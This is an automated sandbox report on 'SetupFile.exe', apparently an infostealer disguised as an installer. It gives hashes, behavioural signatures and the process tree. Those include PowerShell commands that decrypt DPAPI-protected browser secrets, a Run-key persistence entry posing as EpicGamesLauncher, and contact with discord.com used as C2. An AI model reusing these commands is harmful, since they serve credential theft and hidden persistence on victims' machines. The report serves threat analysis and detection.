Overview
overview
7Static
static
3SetupFile 1.0.0.exe
windows7-x64
7SetupFile 1.0.0.exe
windows10-2004-x64
7$PLUGINSDI...ls.dll
windows7-x64
3$PLUGINSDI...ls.dll
windows10-2004-x64
3$PLUGINSDI...em.dll
windows7-x64
3$PLUGINSDI...em.dll
windows10-2004-x64
3LICENSES.c...m.html
windows7-x64
1LICENSES.c...m.html
windows10-2004-x64
1SetupFile.exe
windows7-x64
1SetupFile.exe
windows10-2004-x64
7d3dcompiler_47.dll
windows10-2004-x64
1ffmpeg.dll
windows7-x64
1ffmpeg.dll
windows10-2004-x64
1libEGL.dll
windows7-x64
1libEGL.dll
windows10-2004-x64
1libGLESv2.dll
windows7-x64
1libGLESv2.dll
windows10-2004-x64
1locales/uk.ps1
windows7-x64
1locales/uk.ps1
windows10-2004-x64
1resources/elevate.exe
windows7-x64
1resources/elevate.exe
windows10-2004-x64
1vk_swiftshader.dll
windows7-x64
1vk_swiftshader.dll
windows10-2004-x64
1vulkan-1.dll
windows7-x64
1vulkan-1.dll
windows10-2004-x64
1$PLUGINSDI...7z.dll
windows7-x64
3$PLUGINSDI...7z.dll
windows10-2004-x64
3Analysis
-
max time kernel
153s -
max time network
166s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
02/03/2024, 21:28
Static task
static1
Behavioral task
behavioral1
Sample
SetupFile 1.0.0.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
SetupFile 1.0.0.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/StdUtils.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/System.dll
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/System.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
LICENSES.chromium.html
Resource
win7-20240220-en
Behavioral task
behavioral8
Sample
LICENSES.chromium.html
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
SetupFile.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
SetupFile.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
d3dcompiler_47.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral12
Sample
ffmpeg.dll
Resource
win7-20240221-en
Behavioral task
behavioral13
Sample
ffmpeg.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral14
Sample
libEGL.dll
Resource
win7-20240215-en
Behavioral task
behavioral15
Sample
libEGL.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral16
Sample
libGLESv2.dll
Resource
win7-20240221-en
Behavioral task
behavioral17
Sample
libGLESv2.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral18
Sample
locales/uk.ps1
Resource
win7-20240221-en
Behavioral task
behavioral19
Sample
locales/uk.ps1
Resource
win10v2004-20240226-en
Behavioral task
behavioral20
Sample
resources/elevate.exe
Resource
win7-20240221-en
Behavioral task
behavioral21
Sample
resources/elevate.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral22
Sample
vk_swiftshader.dll
Resource
win7-20240215-en
Behavioral task
behavioral23
Sample
vk_swiftshader.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral24
Sample
vulkan-1.dll
Resource
win7-20240221-en
Behavioral task
behavioral25
Sample
vulkan-1.dll
Resource
win10v2004-20240226-en
Behavioral task
behavioral26
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win7-20240221-en
Behavioral task
behavioral27
Sample
$PLUGINSDIR/nsis7z.dll
Resource
win10v2004-20240226-en
General
-
Target
SetupFile.exe
-
Size
154.6MB
-
MD5
101e173a0df61c3e89ec56e49104df9a
-
SHA1
1ccfb7a85944bd7e84eed587af52b3b03b756575
-
SHA256
21f5c39e0d4295dceb68bfa9a58e976f36d89e095a9d6eda4cb0d2e1640782a5
-
SHA512
134f03e73020c2877c9d526351a344f0a2b80df1f5b0cbffec3afcac7954dc0c00ac2e7bffeff0434f637234721ed169aa263edb04ac5fb93bb2c507c4e12708
-
SSDEEP
1572864:zCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:TDAgZi
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation SetupFile.exe -
Loads dropped DLL 1 IoCs
pid Process 5096 SetupFile.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EpicGamesLauncher = "C:\\Users\\Admin\\AppData\\Local\\Temp\\SetupFile.exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 41 discord.com 42 discord.com 45 discord.com -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
pid Process 640 cmd.exe 2748 cmd.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 1408 tasklist.exe 3872 tasklist.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 3960 powershell.exe 3960 powershell.exe 3960 powershell.exe 4664 powershell.exe 4664 powershell.exe 4664 powershell.exe 5096 SetupFile.exe 5096 SetupFile.exe 4016 SetupFile.exe 4016 SetupFile.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1408 tasklist.exe Token: SeDebugPrivilege 3872 tasklist.exe Token: SeDebugPrivilege 3960 powershell.exe Token: SeDebugPrivilege 4664 powershell.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe Token: SeShutdownPrivilege 5096 SetupFile.exe Token: SeCreatePagefilePrivilege 5096 SetupFile.exe -
Suspicious use of WriteProcessMemory 59 IoCs
description pid Process procid_target PID 5096 wrote to memory of 3412 5096 SetupFile.exe 92 PID 5096 wrote to memory of 3412 5096 SetupFile.exe 92 PID 3412 wrote to memory of 1408 3412 cmd.exe 94 PID 3412 wrote to memory of 1408 3412 cmd.exe 94 PID 5096 wrote to memory of 2108 5096 SetupFile.exe 96 PID 5096 wrote to memory of 2108 5096 SetupFile.exe 96 PID 5096 wrote to memory of 2220 5096 SetupFile.exe 97 PID 5096 wrote to memory of 2220 5096 SetupFile.exe 97 PID 5096 wrote to memory of 640 5096 SetupFile.exe 98 PID 5096 wrote to memory of 640 5096 SetupFile.exe 98 PID 2108 wrote to memory of 3872 2108 cmd.exe 102 PID 2108 wrote to memory of 3872 2108 cmd.exe 102 PID 640 wrote to memory of 3960 640 cmd.exe 103 PID 640 wrote to memory of 3960 640 cmd.exe 103 PID 2220 wrote to memory of 2472 2220 cmd.exe 104 PID 2220 wrote to memory of 2472 2220 cmd.exe 104 PID 5096 wrote to memory of 2748 5096 SetupFile.exe 105 PID 5096 wrote to memory of 2748 5096 SetupFile.exe 105 PID 2748 wrote to memory of 4664 2748 cmd.exe 107 PID 2748 wrote to memory of 4664 2748 cmd.exe 107 PID 5096 wrote to memory of 1128 5096 SetupFile.exe 108 PID 5096 wrote to memory of 1128 5096 SetupFile.exe 108 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 5096 wrote to memory of 2972 5096 SetupFile.exe 110 PID 1128 wrote to memory of 2796 1128 cmd.exe 111 PID 1128 wrote to memory of 2796 1128 cmd.exe 111 PID 5096 wrote to memory of 4608 5096 SetupFile.exe 112 PID 5096 wrote to memory of 4608 5096 SetupFile.exe 112 PID 5096 wrote to memory of 4016 5096 SetupFile.exe 119 PID 5096 wrote to memory of 4016 5096 SetupFile.exe 119
Processes
-
C:\Users\Admin\AppData\Local\Temp\SetupFile.exe"C:\Users\Admin\AppData\Local\Temp\SetupFile.exe"1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:3412 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"2⤵
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\system32\tasklist.exetasklist3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3872
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f"2⤵
- Suspicious use of WriteProcessMemory
PID:2220 -
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /f3⤵PID:2472
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,39,157,190,44,185,213,196,73,159,101,157,196,251,40,97,204,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,207,176,84,217,60,156,184,59,3,27,231,184,96,180,176,22,190,214,124,225,126,33,24,28,196,26,70,57,195,110,188,82,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,30,83,80,130,223,215,209,200,154,200,135,30,7,211,45,117,47,236,133,54,162,197,248,48,15,191,4,221,82,229,239,73,48,0,0,0,242,255,149,87,119,78,203,254,44,206,112,166,170,56,159,42,141,204,250,131,129,122,112,139,143,245,150,254,135,4,213,203,225,73,250,206,251,122,33,94,166,36,90,11,101,93,151,175,64,0,0,0,160,247,120,235,5,145,28,214,21,43,57,158,137,156,192,137,204,32,47,26,118,70,86,248,246,160,26,236,190,176,49,87,14,250,197,37,89,219,92,10,168,37,162,180,48,244,74,4,145,119,28,38,226,69,36,114,141,14,108,246,190,243,105,236), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:640 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,39,157,190,44,185,213,196,73,159,101,157,196,251,40,97,204,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,207,176,84,217,60,156,184,59,3,27,231,184,96,180,176,22,190,214,124,225,126,33,24,28,196,26,70,57,195,110,188,82,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,30,83,80,130,223,215,209,200,154,200,135,30,7,211,45,117,47,236,133,54,162,197,248,48,15,191,4,221,82,229,239,73,48,0,0,0,242,255,149,87,119,78,203,254,44,206,112,166,170,56,159,42,141,204,250,131,129,122,112,139,143,245,150,254,135,4,213,203,225,73,250,206,251,122,33,94,166,36,90,11,101,93,151,175,64,0,0,0,160,247,120,235,5,145,28,214,21,43,57,158,137,156,192,137,204,32,47,26,118,70,86,248,246,160,26,236,190,176,49,87,14,250,197,37,89,219,92,10,168,37,162,180,48,244,74,4,145,119,28,38,226,69,36,114,141,14,108,246,190,243,105,236), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3960
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,39,157,190,44,185,213,196,73,159,101,157,196,251,40,97,204,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,65,175,34,250,158,248,47,122,214,12,177,5,236,230,160,214,54,9,146,172,200,64,166,247,115,211,191,65,67,226,141,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,98,178,61,180,99,60,64,189,114,141,41,44,142,240,192,46,164,34,135,204,86,18,252,196,99,31,197,76,32,227,52,191,48,0,0,0,163,242,13,136,184,138,94,89,30,226,191,237,96,45,115,176,235,168,27,29,123,32,152,89,96,235,171,142,225,115,229,222,160,238,79,11,59,253,161,149,56,39,5,178,191,80,16,62,64,0,0,0,170,27,181,16,68,18,53,67,196,152,228,52,101,132,193,39,212,87,252,149,78,100,15,84,48,124,239,144,250,7,17,140,10,229,7,13,35,191,185,220,162,6,217,41,30,90,185,255,149,203,57,70,43,19,17,179,103,72,89,68,171,124,83,118), $null, 'CurrentUser')"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,39,157,190,44,185,213,196,73,159,101,157,196,251,40,97,204,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,65,175,34,250,158,248,47,122,214,12,177,5,236,230,160,214,54,9,146,172,200,64,166,247,115,211,191,65,67,226,141,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,98,178,61,180,99,60,64,189,114,141,41,44,142,240,192,46,164,34,135,204,86,18,252,196,99,31,197,76,32,227,52,191,48,0,0,0,163,242,13,136,184,138,94,89,30,226,191,237,96,45,115,176,235,168,27,29,123,32,152,89,96,235,171,142,225,115,229,222,160,238,79,11,59,253,161,149,56,39,5,178,191,80,16,62,64,0,0,0,170,27,181,16,68,18,53,67,196,152,228,52,101,132,193,39,212,87,252,149,78,100,15,84,48,124,239,144,250,7,17,140,10,229,7,13,35,191,185,220,162,6,217,41,30,90,185,255,149,203,57,70,43,19,17,179,103,72,89,68,171,124,83,118), $null, 'CurrentUser')3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4664
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\SetupFile.exe" /f"2⤵
- Suspicious use of WriteProcessMemory
PID:1128 -
C:\Windows\system32\reg.exereg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v EpicGamesLauncher /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\SetupFile.exe" /f3⤵
- Adds Run key to start application
PID:2796
-
-
-
C:\Users\Admin\AppData\Local\Temp\SetupFile.exe"C:\Users\Admin\AppData\Local\Temp\SetupFile.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\SetupFile" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1716 --field-trial-handle=1880,i,14225943549362777755,6286492048928942185,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:22⤵PID:2972
-
-
C:\Users\Admin\AppData\Local\Temp\SetupFile.exe"C:\Users\Admin\AppData\Local\Temp\SetupFile.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\SetupFile" --mojo-platform-channel-handle=2120 --field-trial-handle=1880,i,14225943549362777755,6286492048928942185,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:82⤵PID:4608
-
-
C:\Users\Admin\AppData\Local\Temp\SetupFile.exe"C:\Users\Admin\AppData\Local\Temp\SetupFile.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\SetupFile" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1948 --field-trial-handle=1880,i,14225943549362777755,6286492048928942185,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:4016
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f48896adf9a23882050cdff97f610a7f
SHA14c5a610df62834d43f470cae7e851946530e3086
SHA2563ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78
SHA51216644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9
-
Filesize
1KB
MD546d6c89b6a449ce91c1a3691c516e10e
SHA1dedf2c05d83a8fc311e39fa86af575866f9f7ece
SHA256f6841440d2949cf97fb621923a2f931fca567382856cb60fa4c8ce3f9b81e55f
SHA512bd222cc430c28abe832787973ed2a7a07d58d92f34eed1ebfe69fc4cd8ed59443ed93799979fd39d1b76ef6ff247f3ceb12b3c537de09ffba72ebec748f3e1cd
-
Filesize
1.8MB
MD53072b68e3c226aff39e6782d025f25a8
SHA1cf559196d74fa490ac8ce192db222c9f5c5a006a
SHA2567fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
SHA51261ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82